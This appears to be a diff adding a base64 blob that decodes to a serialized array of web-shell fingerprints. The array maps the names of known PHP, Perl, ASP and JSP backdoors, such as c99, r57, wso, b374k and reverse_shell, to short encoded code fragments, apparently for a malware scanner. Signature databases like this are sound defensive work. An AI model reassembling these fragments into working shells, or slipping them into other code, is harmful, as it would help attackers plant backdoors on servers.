+IjtzOjE1OiJnb29uWzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNBOFptOXVkQ0J6YVhwbFBTSXlJaUJt +WVdObFBTSlVZV2h2YldFaVBrWjBjQ0E4TDJadmJuUStEUW9nSUMiO3M6MTc6ImNwYW5lbFsyXVsw +XVtwaHBdIjtzOjY0OiJiaUFpTGlKUVF6a3dJRm9nSWk0aVdDQWlMaUpvTUNCWklDSXVJbGhLYkZs +VU5HNVBNekFnVGlCRElpNGliVlpxIjtzOjIzOiJzaW1wbGVfc2hlbGxbMl1bMF1bcGhwXSI7czo2 +NDoiWVdSNk1uSjROSFZsTmpNeU4zRXhXZzBLVUV3elNVNTJkbHA0TDNCRUwzcGFaa3RFTjJST1My +WTFNREJKY0dzeiI7czoxNjoiZmVuaXhbMF1bMF1bcGhwXSI7czo2NDoiaGpiMlJsWkNCaWVTQmth +VzVuWjI4cExTMCtQQzltYjI1MFBqd3ZZMlZ1ZEdWeVBnb2lPd29LQ21sbUlDZ2hhWCI7czoxNjoi +bXlzcWxbMl1bMF1bcGhwXSI7czo2NDoiaVBnMEtQSFJsZUhSaGNtVmhJSEp2ZDNNOUlqRTVJaUJ1 +WVcxbFBTSlRNU0lnWTI5c2N6MGlPRGNpUGljN0RRcCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzBd +WzBdW3BocF0iO3M6NjQ6ImJHUmxjaXhVVWxWRkRRcHlaWE53YjI1elpTNTNjbWwwWlNnaVJtOXNa +R1Z5T2lBaUlDWWdjMlZzUm05c1pHVnkiO3M6MTg6Im50ZGFkZHlbMV1bMF1bYXNwXSI7czo2NDoi +dldGTUtVVkpUUWtZNGREWllWRTR5V1VoaVVXeDZWVmxyTm5GcGRVbHNiRk56ZFhweGEyOUhWMDVp +V21oMWQyWSI7czoxNjoiYjM3NGtbMF1bMF1bcGhwXSI7czo2NDoiVTBWTVJpZGRMaUkvWVdOMFBX +MWhibUZuWlhJbVpHVnNQU0l1SkdSakxpSStSR1ZzUEM5MFpENGlPd29rWkdseSI7czoxNzoibnNo +ZWxsWzFdWzBdW3BocF0iO3M6NjQ6IkFpZEdsdFpXOTFkQ0lLQ1dWc2MyVTZDUW9KQ1dsbUlIQjNY +Mmx1SUQwOUlGQlhPZ2tLQ1FrSlkyOXViaTV6WlciO3M6MjE6InBoeXRvbnNoZWxsWzBdWzBdW3B5 +XSI7czo2NDoibkJ2Y0dWdUlpa3BldzBLWm5WdVkzUnBiMjRnYlhsemFHVnNiR1Y0WldNb0pHTnZi +VzFoYm1RcElIc05DbWxtSSI7czoyMToibG9jdXNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJqYkhW +a1pTZ2lMMlYwWXk5d1lYTnpkMlFpS1RzTkNtbHVhVjl5WlhOMGIzSmxLQ0p6WVdabFgyMXZaR1Vp +S1RzIjtzOjIwOiJyb290c2hlbGxbMl1bMF1bcGhwXSI7czo2NDoiRzF3VjBGUFFWZFlVVEJ1TlVK +UlBUMG5LU2twT3lCOURRcGxiSE5sSUhzZ1pYWmhiQ2huZW1sdVpteGhkR1VvWSI7czoyNToic2hl +bGxfdXBsb2FkZXJbNV1bMF1bcGhwXSI7czo2NDoiK1BHSnlQaWM3RFFwbFkyaHZJQ2RUWlhKMlpY +SWdhVzVtYjNKdFlYUnBiMjV6UEdKeVBqeGljajRuT3cwS1pXTiI7czoxOToiYmFja2Rvb3JbMF1b +MF1bcGhwXSI7czo2NDoiUXpRNFZrNWxla2hQZEc4M2JVVnpOSFo2VjBoRWNIRkhkR3hoTjBnM2My +UTVVQ3MzUWpaSVNqQldjWGc0ZFRkNSI7czoyOToiZ29oYWNrX3Bvd2Vyc2VydmVyWzBdWzBdW3Bo +cF0iO3M6NjQ6IkFnSUNBZ0lDQWdJQ0FnYlhrZ0pHNWhkSEpwZUNBOUlDUXhPdzBLSUNBZ0lDQWdJ +Q0FnSUNBZ2JYa2dKR0Z5WnkiO3M6MTg6InNoZWxsYm90WzJdWzBdW3BsXSI7czo2NDoiWW9JQ1Jm +VUU5VFZGc25YMlZrYVhRblhTQXBJSHNLQ1dWamFHOGdKenhpY2o0OFptOXliU0J1WVcxbFBTSjBa +WCI7czoxNToiY21kWzMyXVswXVtwaHBdIjtzOjY0OiJHVXdYSGcyTmx4NE9EbGNlRFExWEhoalpW +eDRaVGhjZUdGaFhIaG1NbHg0Wm1aY2VHWm1YSGc0TTF4NFl6UmNlIjtzOjI0OiJzaGVsbF9leHBs +b2l0WzBdWzBdW3BocF0iO3M6NjQ6IkZyT3dvSkNXTmhjMlVnTlRvS0NRa0pabTl5S0Rza1gxQlBV +MVJiSjNBeUoxMGdQRDBnSkY5UVQxTlVXeWR3TXkiO3M6MTk6Im9yYnNoZWxsWzFdWzBdW3BocF0i +O3M6NjQ6IlJmVUU5VFZGc2laaUpkSUQ4K0RRbzhQeUI5SUQ4K0RRbzhQeUFrZEdWemRGOW1kVzVq +SUQwZ1kzSmxZWFJsWDIiO3M6MTQ6ImNtZFs5XVswXVtwaHBdIjtzOjY0OiJSUVdabmEzSk5NbmRE +Y0RWbFYwUk5OSEozZVVNdlYwUndVek4wUTNSMFJWRTJXVEpyWTFwR1RtOXdSRzlwU2pSIjtzOjE5 +OiJha2F0c3VraVswXVswXVtwaHBdIjtzOjY0OiJUUlZKV1JWSmZWa0ZTVTFzblNGUlVVRjlZWDBa +UFVsZEJVa1JGUkY5R1QxSW5YU2twZXdvZ0lHVmphRzhnSWp4IjtzOjE0OiJnZnNbMV1bMF1bcGhw +XSI7czo2NDoiWFRYaG1SRU4zVTB4SFRYVndTVVY0UzBWdVZYQXZkMnhrY1dSWWRsSmlkVkJvY0do +Wk1YRTJjbUk0Vm1aS1owWiI7czoxNzoiYjM3NGtbMTBdWzBdW3BocF0iO3M6NjQ6ImpBM1EybFNj +RmxYVW10amFqRndZbTFXTUZneVJqQmlNalJ2U2toU2FHTnRaR3hrUTJ0blpraDNaMXBIYkd4TFEi +O3M6MTc6ImNvZGVyelswXVswXVtwaHBdIjtzOjY0OiJrTnZiblJsYm5RdGRIbHdaVG9nZEdWNGRD +OW9kRzFzWEc1Y2JpSTdEUXB3Y21sdWRDYzhJVVJQUTFSWlVFVWdhIjtzOjE5OiJwcml2OF9zY3Jb +MV1bMF1bcGxdIjtzOjY0OiJjeEp6c0tDbWxtS0NSZlUwVlRVMGxQVGxzbllXNG5YVDA5TUNsN0Nt +VmphRzhnSkdobFlXUmxjanNLWldOb2J5IjtzOjI1OiJhbnRpY2hhdF9zaGVsbFswXVswXVtwaHBd +IjtzOjY0OiJ3K0NqeG9aV0ZrUGdvOGRHbDBiR1UrVW5VeU5GQnZjM1JYWldKVGFHVnNiQ0F0SUNJ +dUpGOVFUMU5VV3lkamJXIjtzOjE0OiJjbWRbMl1bMF1bcGhwXSI7czo2NDoiUEw4SUNBZ0lDQWdJ +Q0FnSUNBZ1hDSWdQaUk3Q21WamFHOGdJZ284YUhJZ2QybGtkR2c5WENJeE1EQWxYQ0lnYyI7czoy +MToiY3liZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJFMVVpdFFSa0pSTTBWdmJXZFNOSFJpYkhw +WlpVRldialF2VTNjMU5teHFXa053UWpWdFdIQnhibU01UmtaQk1XIjtzOjIwOiJob3N0ZGV2aWxb +MV1bMF1bcGhwXSI7czo2NDoiVjlsYm1ReExpUm1aVHNLZlFwcFppZ2tiWGx6Y1d4ZmIyNThmQ1J0 +YzNOeGJGOXZibng4SkhCblgyOXVmSHdrYiI7czoxNToicjU3WzE2XVswXVtwaHBdIjtzOjY0OiJn +a2Jpd2tkSGgwUFNjbktRcDdDbVZqYUc4Z0p6eDBZV0pzWlNCM2FXUjBhRDB4TURBbElHTmxiR3h3 +WVdSa2FXIjtzOjE0OiJyNTdbOF1bMF1bcGhwXSI7czo2NDoia2NtVnpPdzBLQ1FrSmZRMEtDUWw5 +RFFvSkNTUnpkV05qWlhOeklEMGdNRHNOQ2drSkpHRjBkR1Z0Y0hSeklEMCI7czoxNDoid3NvWzFd +WzBdW3BocF0iO3M6NjQ6IldGdVpDZGRLU2tOQ2cwS0NRa0pDUWw3RFFvTkNna0pDUWtKQ1hCeWFX +NTBJQ0k4Y0hKbFBpSTdEUW9OQ2drSkMiO3M6MjA6Imlyb25zaGVsbFswXVswXVtwaHBdIjtzOjY0 +OiJDQWdJQ0FpTWpFNFhDNHhPRnd1TVRjMFhDNHlOeUlzRFFvZ0lDQWdJQ0FnSUNJMk5Wd3VNek5j +TGpnM1hDNDVOIjtzOjI0OiJzcGFtX3RydXN0YXBwWzFdWzFdW3BocF0iO3M6NjQ6Im1NakJtT0Rn +elpTSTdDaVJqYjJ4dmNpQTlJQ0lqWkdZMUlqc0tKR1JsWm1GMWJIUmZZV04wYVc5dUlEMGdKMFoi +O3M6MjA6ImZpbGVzbWFuWzE1XVswXVtwaHBdIjtzOjY0OiJTZ2tYMU5GVWxaRlVsc25TRlJVVUY5 +SVQxTlVKMTB1SjE5TmVWTlJUQzV6Y1d3bktUc0tDZ29LQ1dobFlXUmxjIjtzOjE3OiJwaHBzcHlb +MV1bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQWdjR0Z6YzNSb2NuVW9aMlYwWlc1MktDSklWRlJRWDBG +RFEwVlFWRjlNUVU1SFZVRkhSU0lwS1RzZyI7czoyNjoiYWNjZXB0X2xhbmd1YWdlWzBdWzBdW3Bo +cF0iO3M6NjQ6ImtYMUJQVTFSYkozQXhKMTBnUFQwZ0ozbGxjeWNwQ2drSmFXWW9RSFZ1YkdsdWF5 +aHdjbVZuWDNKbGNHeGhZMlUiO3M6MjA6ImZpbGVzbWFuWzIxXVswXVtwaHBdIjtzOjY0OiIwaWMy +TmhiblI1Y0dVaVBnMEtJQ0FnSUNBZ0lDQWdQRzl3ZEdsdmJpQjJZV3gxWlQwaU1TSStEUW9nSUNB +Z0lDIjtzOjIwOiJmaWxlc21hblsyNV1bMF1bcGhwXSI7czo2NDoid1pTSXNJQ0ozSWlrc0lDQXZM +eUJ6ZEdSdmRYUWdhWE1nWVNCd2FYQmxJSFJvWVhRZ2RHaGxJR05vYVd4a0lIZCI7czoyMjoic2hl +bGxhdGlsZGlbMV1bMF1bcGhwXSI7czo2NDoiM0p6Snl3Z01DazdEUXBBYzJWMFgzUnBiV1ZmYkds +dGFYUW9NQ2s3RFFwQWMyVjBYMjFoWjJsalgzRjFiM1JsYyI7czoyMDoiMW43M2N0aW9uWzBdWzBd +W3BocF0iO3M6NjQ6ImtZWFJoSjMwdURRb2pJRTkwYUdWeUlIWmhjbWxoWW14bGN5QmpZVzRnWW1V +Z1lXTmpaWE56WldRZ2RYTnBibWMiO3M6MTk6ImNnaS1zaGVsbFswXVswXVtwbF0iO3M6NjQ6Inlh +VzVuSUdSemRGQmhkR2dwSUhzS0NXSnZiMnhsWVc0Z1lsSmxkQ0E5SUhSeWRXVTdDZ2tLQ1hSeWVT +QjdDZ2siO3M6MjM6ImpzcHdlYnNoZWxsWzBdWzBdW2phdmFdIjtzOjY0OiJCcFlqTldNR05JVmpC +SmFVSXlXVmQ0TVZwVU1HbEtlbk5uV2xkT2IySjVRV3RpTTFZd1kwaFdNRTk1UW14Wk1tIjtzOjE1 +OiJjbWRbMzNdWzBdW3BocF0iO3M6NjQ6ImdQRDl3YUhBTkNpOHFJRTV2ZHlCM1pTQnRZV3RsSUdF +Z2JHbHpkQ0J2WmlCMGFHVWdaR2x5WldOMGIzSnBaWE0iO3M6MjM6ImF5eWlsZGl6X3RpbVsxXVsw +XVtwaHBdIjtzOjY0OiIwTjNaVzA0TDFRdlkzWm9ZMkV5WkVzelZrdEtMMlUzSzNrNFdHUjVPRWhs +YVRVM1RVMDVXWEJWZHk5SWJ5OHphIjtzOjE1OiJjOTlbMThdWzBdW3BocF0iO3M6NjQ6IkdaMWJt +TjBhVzl1WDJWNGFYTjBjeWduYjJOcFgyTnZibTVsWTNRbktTa2dEUW9nSUNBZ0lDQWdJQ1IwWlcx +d1ciO3M6MjA6ImZpbGVzbWFuWzEzXVswXVtwaHBdIjtzOjY0OiJYM0psYzNSdmNtVW9JbTl3Wlc1 +ZlltRnpaV1JwY2lJcE93b2tiR2w2TUQxemFHVnNiRjlsZUdWaktDUmZVRTlUIjtzOjE4OiJsaXpv +emltWzBdWzBdW3BocF0iO3M6NjQ6ImdiblZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tU +c0tQejRLUEdoMGJXdytQR2hsWVdRK1BHMWxkR0UiO3M6MTQ6ImM5OVs2XVswXVtwaHBdIjtzOjY0 +OiJHVmphRzhnSWlSZlUwVlNWa1ZTVzFCSVVGOVRSVXhHWFNJZ095QS9QaUlnYldWMGFHOWtJRDBn +SW5CdmMzUWlQIjtzOjIyOiJyZW1vdGVzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJWY01UWXlYSGcz +TUZ4NE4yTmNNVFUxYzI1Y01UUXlYSGcyWmx4NE56UjhZMXg0TnpKY01UUXhYREUyTjJ4bGNuIjtz +OjI2OiJzaGVsbF91cGxvYWRlclsxNl1bMF1bcGhwXSI7czo2NDoid00zcFhTMjVTWmtsaVJtaDBV +RFZ4UlcxSE4xVnhXVXhRVkV4b1ZIUlVkMDl2YkhKTVUwSkRkM1F4ZGtOaFJrRiI7czoyMToibm9n +cm9kcEJvdFsxXVsxXVtwaHBdIjtzOjY0OiJCcGMyRm9hMkZ1SUdSbGJtZGhiaUJ6Y0dGemFRMEtE +UW92S2lvcUlFRmtiV2x1SUNvcUtpOE5DaVJoWkcxcGJpIjtzOjIxOiJnYXVsaXJjYm90WzBdWzJd +W3BocF0iO3M6NjQ6IjJodklDSWdJRHgwWkNCdWIzZHlZWEFnWTI5c2MzQmhiajFjSWpaY0lpQnpk +SGxzWlQxY0luQmhaR1JwYm1jdGIiO3M6MTU6ImVybmVbMF1bMF1bcGhwXSI7czo2NDoiTnBlbVU5 +TVRFd1Bqd3ZabTl5YlQ0OEwyTmxiblJsY2o0OFluSStDaUk3Q21sbUtFQWtYMUJQVTFSYkozTm9K +MSI7czoxNDoiaW1nWzBdWzBdW3BocF0iO3M6NjQ6IngxYzJnb0tUc0tJQ0FnSUNBZ0lDQWdJQ0Fn +SUNBZ0lDQWdJQ0FnSUNBZ2NtVjBkWEp1SUhKbGNHeGhZMlZPWlgiO3M6MTk6InB3bnNoZWxsWzBd +WzBdW2pzcF0iO3M6NjQ6IlZ5ZG1WeVd6RmRMQ0FrYkdsdVpWc3dYU3dnSkhSdGNDa2dLU0I3RFEw +S0NRa0pDUWtKQ1NSemRXTmpaWE56S3kiO3M6MTk6ImZpbGVzbWFuWzhdWzBdW3BocF0iO3M6NjQ6 +Im9KZlEwS2ZRMEtEUXAzYUdsc1pTZ2tiR1YyWld3dExTa2dZMmhrYVhJb0lpNHVJaWs3RFFvTkNp +UmphQ0E5SUciO3M6MjY6Iml0c2VjdGVhbV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJJNU1EUmlP +R05tWXpRNE5EZGpOVFZpTmlJN0lHbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25jSFZtWkcxeUox +IjtzOjE1OiJjbWRbMjldWzBdW3BocF0iO3M6NjQ6IlZGVTFSYkoyTnRaQ2RkS1NsN0RRb2dJQ0Fn +SUNBZ0lHVmphRzhnSWp4d2NtVStJanNOQ2lBZ0lDQWdJQ0FnSkciO3M6MTU6ImNtZFsyMF1bMF1b +cGhwXSI7czo2NDoiVlFzSUNkVlZFWXRPQ2NwT3dvZ0lDQWdJQ0I5Q2dvZ0lDQWdJQ0IzYUdsc1pT +QW9JV1psYjJZb0pHbHZXekpkSyI7czoyMDoiZGl2ZXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik1U +QXdJaUIyWVd4MVpUMGlQRDhnWldOb2J5QWtZM1Z5WkdseU95QS9QaUkrUEM5MFpENEtJQ0FnSUNB +Z1BIUmsiO3M6MjA6ImxhbWFzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJsSUcxbGRHaHZaRDF3YjNO +MElHVnVZM1I1Y0dVOWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlUNGdKRzV2ZDJGIjtzOjIwOiJw +aHBzaGVsbFsyM11bMF1bcGhwXSI7czo2NDoiZ2RHVnliWE1nWVhKbElHNXZkQ0JoWTJObGNIUmhZ +bXhsSUhSdklIbHZkU3dnZEdobGJnMEtMeThnWkc4Z2JtOSI7czoyNDoicmV2ZXJzZV9zaGVsbFsw +XVswXVtwaHBdIjtzOjY0OiJpQmxibU52ZFc1MFpYSmxaQ0JoYmlCcGJuUmxjbTVoYkNCbGNuSnZj +aUJ2Y2dwdGFYTmpiMjVtYVdkMWNtRjBhIjtzOjE5OiJtb2hhamVyMjJbMF1bMF1bcGxdIjtzOjY0 +OiJvU1dsR01VbElSV2xqVTBGcFNYbFphRWxwUVhOSmVWRm5aSGxGYUVwNVkybGthV05vU1ZORmFF +bFRRWFJKZVRCIjtzOjIwOiJmaWxlc21hblsxOV1bMF1bcGhwXSI7czo2NDoibFJ6TllValJrYjNo +bmVsSkpWMk5XVFc1amNVVjNURmMxZW5Wd09WZGpXV050ZW1WcVVEZFdObmRNYWxkM09XOCI7czox +ODoid2Vicm9vdFswXVswXVtwaHBdIjtzOjY0OiJodklDUjBZV0pzWlY5MWNESTdDbVZqYUc4Z0pH +WnZiblE3Q21WamFHOGdJanhpUGlJdWQzTW9NamNwTGlSc1lXIjtzOjE0OiJyNTdbMF1bMF1bcGhw +XSI7czo2NDoiMHRMUzB0TFMwdExTMHRDZ29nSUVScGJTQnZVMk55YVhCMENpQWdSR2x0SUc5VFkz +SnBjSFJPWlhRS0lDQkVhVyI7czoxNDoiY21kWzBdWzBdW2FzcF0iO3M6NjQ6ImxZVDRpT3cwS0pI +Tm1iblE5SWp4bWIyNTBJR1poWTJVOWRHRm9iMjFoSUhOcGVtVTlNaUJqYjJ4dmNqMGpNREEiO3M6 +MTM6Im1tWzBdWzBdW3BocF0iO3M6NjQ6Ik5EVWs5TVRFSkJVaTFCVWxKUFZ5MURUMHhQVWpvZ0l6 +TTJNMlEwWlRzS1UwTlNUMHhNUWtGU0xWUlNRVU5MTFUiO3M6MTg6Im5zdHZpZXdbMl1bMF1bcGhw +XSI7czo2NDoiVEl1Tmk0MExYQnNNaThuTEFvbkwzQm9jRTE1UVdSdGFXNHRNaTQyTGpRdGNHd3pM +eWNzQ2ljdmNHaHdUWGxCWiI7czoyOToicGhwbXlhZG1pbl9leHBsb2l0WzBdWzBdW3BocF0iO3M6 +NjQ6Ik1sRm1ZbnBLVFhwM2FDdENTVXNLWWtGUFNUUmpTRzgyVjJNMFp5dFlUR2hGVDI5cGVHVjBl +RGxFYmpOT2FtZFAiO3M6MTY6ImIzNzRrWzJdWzBdW3BocF0iO3M6NjQ6InBPT1ZKYU1FWTJiMjFW +TkRZMFkwbFBNRUZqTVVkeVdVeGtlV2hNUkRkVVVITkVMM0IwVFN0NVlXMXNSRGw2ZEQiO3M6MjY6 +InNoZWxsX3VwbG9hZGVyWzEzXVswXVtwaHBdIjtzOjY0OiJlR3R5YjNKcElEMGdJbUU0WVRRM1l6 +QmhNVFkzTjJZd04yTmhaV1V3T0dGa1ptVmlOVGt6WldRd0lqc2dhV1lvIjtzOjE1OiJjbWRbMzVd +WzBdW3BocF0iO3M6NjQ6InZZMnRsZENrN0RRcDlEUXB6Wlc1a2NtRjNLQ1JKVWtOZlkzVnlYM052 +WTJ0bGRDd2dJbEJTU1ZaTlUwY2dKSEIiO3M6MTk6ImVtcGl4Y3Jld1swXVswXVtwbF0iO3M6NjQ6 +Ind2ZEhJK0lqc05DZzBLY0hKcGJuUWdJangwY2o0OGRHUStQR0krUTJoaGJtZGxJR1JwY21WamRH +OXllVG84TDIiO3M6MTY6IndvcnNlWzFdWzBdW3BocF0iO3M6NjQ6IlZWSkZKMTB1SWp3dlptOXVk +RDQ4TDNSa1BpSTdDbkJ5YVc1MElDQWdJQ0k4TDNSeVBpSTdDbkJ5YVc1MElDQWciO3M6MTU6Indp +bnhbMF1bMF1bcGhwXSI7czo2NDoiWlROWll6SmFXRGRzZFdOMk5sbEdlalpCWjBSbE5YRmFTR1V4 +TlN0bmRreHZVMDFtTkhsSFFteDJOSFpwTUhoViI7czoxNToid3NvWzExXVswXVtwaHBdIjtzOjY0 +OiJQWHQ5S1R0MllYSWdaejFqTG1JdVkyeHBZMnM3WjN4OEtHYzlZeTVpTG1Oc2FXTnJQWHQ5TEdN +dWIyNWpiR2xqIjtzOjE3OiJiMzc0a1sxNF1bMF1bcGhwXSI7czo2NDoibHg0WmpWY2VHUTJYSGhq +WTF4NE5tVmNlR0poWEhnd1pseDRNalJjZUdNMlhIZzVZMXg0TkdWY2VHTTBYSGhsTiI7czoxNToi +Yzk5WzE1XVswXVtwaHBdIjtzOjY0OiJ5OHZPVlJaTkRBMVYyWnhUMjEyYWtrcllraHZZVzlSYzAx +UmVGSXJkWFZpYmpkaWRTc3daaTh2TDNsSU5VSkJSIjtzOjE3OiJjb2RlcnpbMV1bMF1bcGhwXSI7 +czo2NDoiUmxJRDBnUUdsdWFWOW5aWFFvSjNOaFptVmZiVzlrWlNjcE93MEthV1lvSVNSellXWmxY +MjF2WkdVcERRb2dJQyI7czoxNDoid3NvWzldWzBdW3BocF0iO3M6NjQ6IlBqeGhJR2h5WldZOUp5 +UlFTRkJmVTBWTVJqOWhZM1JwYjI0OWRYUnBiSE1tWTI5dGJXRnVaRDF6YUc5M1gzQnkiO3M6MTY6 +Im15c3FsWzNdWzBdW3BocF0iO3M6NjQ6IlNkdUp6NDhabTl1ZENCbVlXTmxQWFJoYUc5dFlTQnph +WHBsUFMweVBqeGlQbTh0TFMxYklGTnVTWEJGY2w5VFEiO3M6MjI6InNuaXBlcnNoZWxsWzFdWzBd +W3BocF0iO3M6NjQ6IkZsYlhFM1RuRjNPSE5ZUWxrd01sWTBkM1F3UnpscWRIZFhUSEpIZUVoaGJW +Rm1URzA0UVhKU1pETm1MM3BtUXoiO3M6MjA6ImZpbGVzbWFuWzIyXVswXVtwaHBdIjtzOjY0OiJo +Y25KaGVTazdDaUFnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ1JmVUU5VFZDQTlJSE4wY21sd2MyeGhj +MmhsYzE5IjtzOjE0OiJ3c29bM11bMF1bcGhwXSI7czo2NDoidG1abWhWV21velNIaE1SVVJ0Y2pG +SlowbG5jVlY1WTJoTFMzVTRjamsyYlVKRVNHdFFTRWcwYW5ZNGJTOUtVMCI7czoxNToid3NvWzEw +XVswXVtwaHBdIjtzOjY0OiJmWW5WbVpsOXdjbVZ3WVhKbEtDazdJQTBLYVdZZ0tDRm1kVzVqZEds +dmJsOWxlR2x6ZEhNb0ltTTVPVjl6WlhOIjtzOjE5OiJwaHBzaGVsbFs1XVswXVtwaHBdIjtzOjY0 +OiJZakkxTUVsSFRuWmlSemw1VUZOSmFrMUVRa2RTYWtGM1NXbzFNMlF6WTNWUldFcG9XV2t4UTJK +SFJtcGhNbWhvIjtzOjI0OiJhcmFiX2JsYWNrX2hhdFsxXVswXVtwbF0iO3M6NjQ6ImdKR2x6YkdG +emRDQTlJR0Z5Y21GNUtEQWdQVDRnVkZKVlJTazdDZ2xsWTJodktDSUpQSFJ5UGx4dUlpazdDZ2wi +O3M6MTk6IndlYmFkbWluWzBdWzJdW3BocF0iO3M6NjQ6IjJGaWMyOXNkWFJsSnpzS1gzRXVjM1I1 +YkdVdWQybGtkR2dnUFNBbk1UWndlQ2M3Q2w5eFcxOXVYU2duWm5KaGIiO3M6MTY6InB6YWR2WzFd +WzFdW3BocF0iO3M6NjQ6IlBEOXdhSEFLSkdWdWRISjVYMnhwYm1VOUlraEJRMHRsWkNCaWVTQkZi +blJ5YVV0aElqc0tKR1p3SUQwZ1ptOXciO3M6MTg6ImVudHJpa2FbMF1bMF1bcGhwXSI7czo2NDoi +bGVIUTFOQ2M5UGlmRGo4T3V3NmpEc2NPcUlNT3l3NlhEcXNPeHc3TERvQ0REb2lERHRNT2d3Nm5E +cThPZ3c3VSI7czoxNDoicjU3WzNdWzBdW3BocF0iO3M6NjQ6Im5XVEpHZWxwVFFXbGpSMUp0U1dw +dlowcEhUakJsV0VKc1VGTkthR05JUW5OaFYwNW9aRWRzZG1KcE9YZGFSMWwiO3M6MTk6ImI2NHNo +ZWxsWzBdWzBdW3BocF0iO3M6NjQ6Ik9TVXc0VVUxeVdGVmpZMHBHWWt4NmJrSjBNME54WVdJNWRs +RjRWMmhMVUdGMksyOWhNa0Z5VVdaM1NqWTRMMEoiO3M6MjA6InN0dW5zaGVsbFszXVswXVtwaHBd +IjtzOjY0OiJtNWxZM1JDWVdOcklFSmhZMnRrYjI5eUlIWnpJREV1TUNCaWVTQk1iM0pFSUc5bUlF +bFNRVTRnU0VGRFMwVlNVIjtzOjI1OiJiYWNrZG9vcmNvbm5lY3RbMF1bMF1bcGxdIjtzOjY0OiJp +Ym05b2RYQWdMM1J0Y0M5dWMzUmZZbVFnSmlJcE93cDFibXhwYm1zb0lpOTBiWEF2Ym5OMFgyTmZZ +bVF1WXlJIjtzOjE4OiJuc3R2aWV3WzFdWzBdW3BocF0iO3M6NjQ6ImxPdzBLRFFvZ0lDQjlEUW9O +Q2cwS0RRcG1kVzVqZEdsdmJpQm5aWFJmY0dWeWJYTW9KR1p1S1EwS0RRcDdEUW8iO3M6MjA6Im4z +ZmE1dDFjYVswXVswXVtwaHBdIjtzOjY0OiJXQ2N1SnpKT2RtSnVKeTRuVW14bFNGSW5MaWRtV1RO +S2JGbFlVaWN1SjJ3bktTeGlZWE5sTmpSZlpHVmpiMlJsIjtzOjE3OiJpZnJhbWVbMF1bMF1bcGhw +XSI7czo2NDoiTVR3bFFDQlFZV2RsSUV4aGJtZDFZV2RsUFNKS2MyTnlhWEIwSWlVK1BDVmxkbUZz +S0ZKbGNYVmxjM1F1U1hSbCI7czoxNToiY21kWzM2XVswXVtwaHBdIjtzOjEzNToiYmI6SkY5YlhU +MHJLeVJmWHpzZ0pGOWJYVDBrWDFzdExTUmZYMTFiSkY5ZlBqNGtYMTlkT3lSZld5UmZYMTB1UFNn +b0pGOWZLeVJmWHlrcklDUmZXeVJmWHkwa1gxOWRLUzRvSkY5Zkt5UmZYeXNrWDE4cEt5UmZXeVJm +WHkwa1gxOWRPdz09IjtzOjE1OiJjbWRbMjddWzBdW3BocF0iO3M6NjQ6ImRHWnZjbTBuWFNrcERR +b2dJQ0FnZXcwS0lDQWdJQ0FrWmlBOUlDUmZSMFZVV3lkbWFXeGxKMTA3RFFvZ0lDQWciO3M6MTk6 +IjEyMDY2N2trWzBdWzBdW3BocF0iO3M6NjQ6Ik5MM2RCZFRKMWJsSmhlbEpxVlVseVlYTlFjMnBY +VVdWNEswOUZjRXBEV25wVFJ6UmtRekZZU2paelMwTlVXa04iO3M6MjA6InN0dW5zaGVsbFs0XVsw +XVtwaHBdIjtzOjY0OiJqNDhhVzV3ZFhRZ2JtRnRaVDBpWTIxa0lpQjBlWEJsUFNKMFpYaDBJaUJ6 +YVhwbFBTSXhNemdpSUhaaGJIVmxQIjtzOjE1OiJjbWRbMjhdWzBdW3BocF0iO3M6NjQ6IjhMM1Jo +WW14bFBpSTdDZ29nSkhCbGNtUnBjaUE5SUVCd1pYSnRhWE56YVc5dWN5aG1hV3hsY0dWeWJYTW9K +SFIiO3M6MTY6InhpbmZvWzBdWzBdW3BocF0iO3M6NjQ6Ik5mWVhKeUlEMGdKRzV2ZEd4eklEMGdi +blZzYkRzS0pIVmtJRDBnZFhKc1pXNWpiMlJsS0NSa0tUc0tQejQ4YUgiO3M6MTU6ImM5OVsxMV1b +MF1bcGhwXSI7czo2NDoiclFtcEhUVmsyTjFCQ1RYSjFkemhqTlhSbFRqSTFka1JGVjI0NWJrbGph +amx6UW05cGJXTjJaVVZ1U0dFNFFXVSI7czoyMDoicGhwc2hlbGxbMjFdWzBdW3BocF0iO3M6NjQ6 +ImlBZ0lDQWdJR0p5WldGck93MEtJQ0FnZlEwS0RRb2dJQ0F2THlCWFlXbDBJSFZ1ZEdsc0lHRWdZ +Mjl0YldGdVoiO3M6MjI6InNoZWxsYXRpbGRpWzBdWzBdW3BocF0iO3M6NjQ6IlIwYVVvMk1Ia3pN +WEJCVDNCRVJubEtaVWRvYjA1VWJYQk9jVGhDVjNNd2VXRjZPRWx6VEd4Q2JVMW1RazlsZDIiO3M6 +MTk6ImZpbGVzbWFuWzRdWzBdW3BocF0iO3M6NjI6IklDaHVjM1FwSUhkb2FXTm9JR3g1Ym5nTkNr +bHpJR3hwYm10eklHbHVjM1JoYkd4bFpEOGdLRzV6ZENrZ2QyIjtzOjE4OiJuc3R2aWV3WzNdWzBd +W3BocF0iO3M6NjQ6ImJXRnBiQ2h6S1NFaUtUc05DZzBLZlEwS1pXTm9ieUFpVTNWalkyVnpjMlox +Ykd4NUlITmxiblFnYldGcGJDaHoiO3M6MjM6ImJsb29kM3Jwcml2OFswXVswXVtwaHBdIjtzOjY0 +OiJaVDBpZEdWNGRDSWdibUZ0WlQwaWJuSmxibUZ0WlNJK0RRbzhhVzV3ZFhRZ2RIbHdaVDBpYzNW +aWJXbDBJaUIyIjtzOjIyOiJzdGFrZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJnUFNBaVpuVnVZ +M1JwYjI1eklpa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9KSE4wWVhSbFBUMHhLU0I3Q2lBIjtz +OjE2OiJteXNxbFs1XVswXVtwaHBdIjtzOjY0OiJBOUlDSmtaWFpwYkhwVGFHVnNiQ0k3RFFva2My 